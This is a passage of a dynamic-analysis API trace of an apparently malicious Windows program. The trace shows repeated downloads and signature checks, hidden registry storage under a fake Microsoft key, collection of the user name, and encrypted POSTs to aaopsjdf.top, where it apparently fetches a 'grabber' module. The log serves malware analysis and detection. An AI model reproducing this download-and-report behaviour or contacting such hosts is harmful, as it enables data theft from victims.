lpBuffer=0x38fe643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38fe643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.659] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.659] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x38ff643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x38ff643*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.660] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.660] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3900643, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x3900643*, lpdwNumberOfBytesRead=0x28ff448*=0xff7) returned 1 [0320.661] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.661] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390163a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x390163a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.662] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.662] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390263a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x390263a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.662] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.663] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390363a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x390363a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.663] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.663] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x390463a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x390463a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.713] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.714] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ae872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ae872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.714] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23af872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23af872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.716] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.716] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b0872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b0872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.717] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b1872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b1872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.718] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b2872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b2872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.719] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.719] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b3872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b3872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.720] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b4872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b4872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.720] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.720] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b5872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b5872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.725] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b6872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b6872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.727] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b7872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b7872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.729] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b8872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b8872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.730] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23b9872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23b9872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.732] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ba872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ba872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.732] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bb872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bb872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.733] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bc872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bc872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.734] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bd872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bd872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.778] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.778] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23be872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23be872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.778] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23bf872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23bf872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.779] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c0872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c0872*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.779] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c1872, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c1872*, lpdwNumberOfBytesRead=0x28ff448*=0xff8) returned 1 [0320.787] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c286a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c286a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.787] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c386a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c386a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.787] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.787] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c486a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c486a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.788] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.788] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c586a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c586a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.791] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.791] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c686a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c686a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.791] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.791] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c786a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c786a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.792] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.792] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c886a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c886a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.792] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.792] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23c986a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23c986a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.991] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.991] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23ca86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23ca86a*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0320.992] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23cb86a, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23cb86a*, lpdwNumberOfBytesRead=0x28ff448*=0x192) returned 1 [0320.997] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0320.997] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23cb9fc, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23cb9fc*, lpdwNumberOfBytesRead=0x28ff448*=0x0) returned 1 [0321.007] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0321.012] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440 | out: lpBuffer=0x28ff444, lpdwBufferLength=0x28ff440) returned 1 [0321.012] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0321.012] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0321.028] CryptImportKey (in: hProv=0x3de630, pbData=0x238e350, dwDataLen=0x120, hPubKey=0x0, dwFlags=0x0, phKey=0x28ff8e4 | out: phKey=0x28ff8e4*=0x45b518) returned 1 [0321.034] CryptCreateHash (in: hProv=0x3de630, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x28ff8d8 | out: phHash=0x28ff8d8) returned 1 [0321.034] CryptHashData (hHash=0x45b4d8, pbData=0x3927a30, dwDataLen=0x14a10, dwFlags=0x0) returned 1 [0321.034] CryptVerifySignatureW (hHash=0x45b4d8, pbSignature=0x38f0048, dwSigLen=0x100, hPubKey=0x45b518, szDescription=0x0, dwFlags=0x0) returned 1 [0321.035] CryptDestroyHash (hHash=0x45b4d8) returned 1 [0321.035] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="F063546A5853AF5508DB5A15751DB34A") returned 0x66c [0321.035] WaitForSingleObject (hHandle=0x66c, dwMilliseconds=0xffffffff) returned 0x0 [0321.035] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff5a0 | out: phkResult=0x28ff5a0*=0x5b0) returned 0x0 [0321.035] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Eteg", lpReserved=0x0, lpType=0x28ff8d0, lpData=0x0, lpcbData=0x28ff5b4*=0x0 | out: lpType=0x28ff8d0*=0x3, lpData=0x0, lpcbData=0x28ff5b4*=0x15860) returned 0x0 [0321.035] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Eteg", lpReserved=0x0, lpType=0x28ff8d0, lpData=0x3943258, lpcbData=0x28ff5b4*=0x15860 | out: lpType=0x28ff8d0*=0x3, lpData=0x3943258*, lpcbData=0x28ff5b4*=0x15860) returned 0x0 [0321.036] RegCloseKey (hKey=0x5b0) returned 0x0 [0321.046] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28ff5b0, lpdwDisposition=0x0 | out: phkResult=0x28ff5b0*=0x5b0, lpdwDisposition=0x0) returned 0x0 [0321.046] RegSetValueExW (in: hKey=0x5b0, lpValueName="Eteg", Reserved=0x0, dwType=0x3, lpData=0x3a210b8*, cbData=0x31090 | out: lpData=0x3a210b8*) returned 0x0 [0321.047] RegCloseKey (hKey=0x5b0) returned 0x0 [0321.049] ReleaseMutex (hMutex=0x66c) returned 1 [0321.049] CloseHandle (hObject=0x66c) returned 1 [0321.049] CryptDestroyKey (hKey=0x45b518) returned 1 [0321.049] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x66c [0321.049] WaitForSingleObject (hHandle=0x66c, dwMilliseconds=0xffffffff) returned 0x0 [0321.049] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef08 | out: phkResult=0x28fef08*=0x5b0) returned 0x0 [0321.050] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x0, lpcbData=0x28fef1c*=0x0 | out: lpType=0x28fef34*=0x3, lpData=0x0, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0321.050] RegQueryValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef34, lpData=0x238f968, lpcbData=0x28fef1c*=0x6f0 | out: lpType=0x28fef34*=0x3, lpData=0x238f968*, lpcbData=0x28fef1c*=0x6f0) returned 0x0 [0321.050] RegCloseKey (hKey=0x5b0) returned 0x0 [0321.050] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28fef1c, lpdwDisposition=0x0 | out: phkResult=0x28fef1c*=0x5b0, lpdwDisposition=0x0) returned 0x0 [0321.050] RegSetValueExW (in: hKey=0x5b0, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x2350db0*, cbData=0x6f0 | out: lpData=0x2350db0*) returned 0x0 [0321.050] RegCloseKey (hKey=0x5b0) returned 0x0 [0321.050] ReleaseMutex (hMutex=0x66c) returned 1 [0321.050] CloseHandle (hObject=0x66c) returned 1 [0321.050] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28fef1c | out: phkResult=0x28fef1c*=0x66c) returned 0x0 [0321.050] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x0, lpcbData=0x28fef30*=0x0 | out: lpType=0x28fef48*=0x3, lpData=0x0, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0321.051] RegQueryValueExW (in: hKey=0x66c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x28fef48, lpData=0x238f968, lpcbData=0x28fef30*=0x6f0 | out: lpType=0x28fef48*=0x3, lpData=0x238f968*, lpcbData=0x28fef30*=0x6f0) returned 0x0 [0321.051] RegCloseKey (hKey=0x66c) returned 0x0 [0321.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff89c | out: phkResult=0x28ff89c*=0x66c) returned 0x0 [0321.051] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x0, lpcbData=0x28ff8b0*=0x0 | out: lpType=0x28ff8c8*=0x3, lpData=0x0, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0321.051] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff8c8, lpData=0x238f968, lpcbData=0x28ff8b0*=0x6f0 | out: lpType=0x28ff8c8*=0x3, lpData=0x238f968*, lpcbData=0x28ff8b0*=0x6f0) returned 0x0 [0321.051] RegCloseKey (hKey=0x66c) returned 0x0 [0321.051] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/grabber_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff8b0 | out: lpUrlComponents=0x28ff8b0) returned 1 [0321.051] GetSystemTime (in: lpSystemTime=0x28ff560 | out: lpSystemTime=0x28ff560*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x33, wMilliseconds=0x389)) [0321.051] SystemTimeToFileTime (in: lpSystemTime=0x28ff560, lpFileTime=0x28ff570 | out: lpFileTime=0x28ff570) returned 1 [0321.051] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28ff5e8, nSize=0x28ff594 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x28ff594) returned 0x1 [0321.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0321.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x28ff4e4 | out: phkResult=0x28ff4e4*=0x66c) returned 0x0 [0321.051] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x0, lpcbData=0x28ff4f8*=0x0 | out: lpType=0x28ff510*=0x3, lpData=0x0, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0321.052] RegQueryValueExW (in: hKey=0x66c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x28ff510, lpData=0x238f968, lpcbData=0x28ff4f8*=0x6f0 | out: lpType=0x28ff510*=0x3, lpData=0x238f968*, lpcbData=0x28ff4f8*=0x6f0) returned 0x0 [0321.052] RegCloseKey (hKey=0x66c) returned 0x0 [0321.052] wvnsprintfW (in: pszDest=0x28ff59c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x28ff574 | out: pszDest="2.6.1") returned 5 [0321.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0321.052] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x28ff756, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c | out: pvStructInfo=0x28ff4b8, pcbStructInfo=0x28ff49c) returned 1 [0321.052] CryptImportPublicKeyInfo (in: hCryptProv=0x3de630, dwCertEncodingType=0x1, pInfo=0x4240a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x4240d0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x4240d8*, PublicKey.cUnusedBits=0x0), phKey=0x28ff4a8 | out: phKey=0x28ff4a8*=0x45b518) returned 1 [0321.052] LocalFree (hMem=0x4240a0) returned 0x0 [0321.052] wvnsprintfA (in: pszDest=0x235c2e0, cchDest=21, pszFmt="%d", arglist=0x28ff3bc | out: pszDest="1515610611") returned 10 [0321.052] CryptEncrypt (in: hKey=0x45b518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x28ff308*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x28ff308*=0x100) returned 1 [0321.052] CryptEncrypt (in: hKey=0x45b518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2397968*, pdwDataLen=0x28ff31c*=0x20, dwBufLen=0x100 | out: pbData=0x2397968*, pdwDataLen=0x28ff31c*=0x100) returned 1 [0321.052] CryptDestroyKey (hKey=0x45b518) returned 1 [0321.052] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/grabber_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff418 | out: lpUrlComponents=0x28ff418) returned 1 [0321.052] wvnsprintfA (in: pszDest=0x238e350, cchDest=516, pszFmt="%s%s", arglist=0x28ff450 | out: pszDest="https://aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q") returned 56 [0321.052] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x28ff410 | out: lpUrlComponents=0x28ff410) returned 1 [0321.052] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0321.052] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0321.052] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0321.052] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0321.052] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0321.053] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0321.053] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\n=@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x238ded0, dwOptionalLength=0x2c0) returned 0 [0321.264] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338 | out: lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338) returned 1 [0321.264] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x28ff334, dwBufferLength=0x4) returned 1 [0321.264] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\n=@ó8\x02\x01", dwHeadersLength=0x13, lpOptional=0x238ded0*, dwOptionalLength=0x2c0 | out: lpOptional=0x238ded0*) returned 1 [0321.865] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x28ff334, lpdwBufferLength=0x28ff338, lpdwIndex=0x0 | out: lpBuffer=0x28ff334*, lpdwBufferLength=0x28ff338*=0x4, lpdwIndex=0x0) returned 1 [0321.865] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.866] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x239d950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239d950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.868] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x239e950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239e950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.869] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.869] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x239f950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x239f950*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.869] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.869] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a0950, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a0950*, lpdwNumberOfBytesRead=0x28ff448*=0xf2b) returned 1 [0321.870] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.870] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a187b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a187b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.872] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.872] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a287b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a287b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.872] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0321.872] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x23a387b, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x28ff448 | out: lpBuffer=0x23a387b*, lpdwNumberOfBytesRead=0x28ff448*=0x1000) returned 1 [0321.873] WaitForSingleObject (hHandle=0x8, 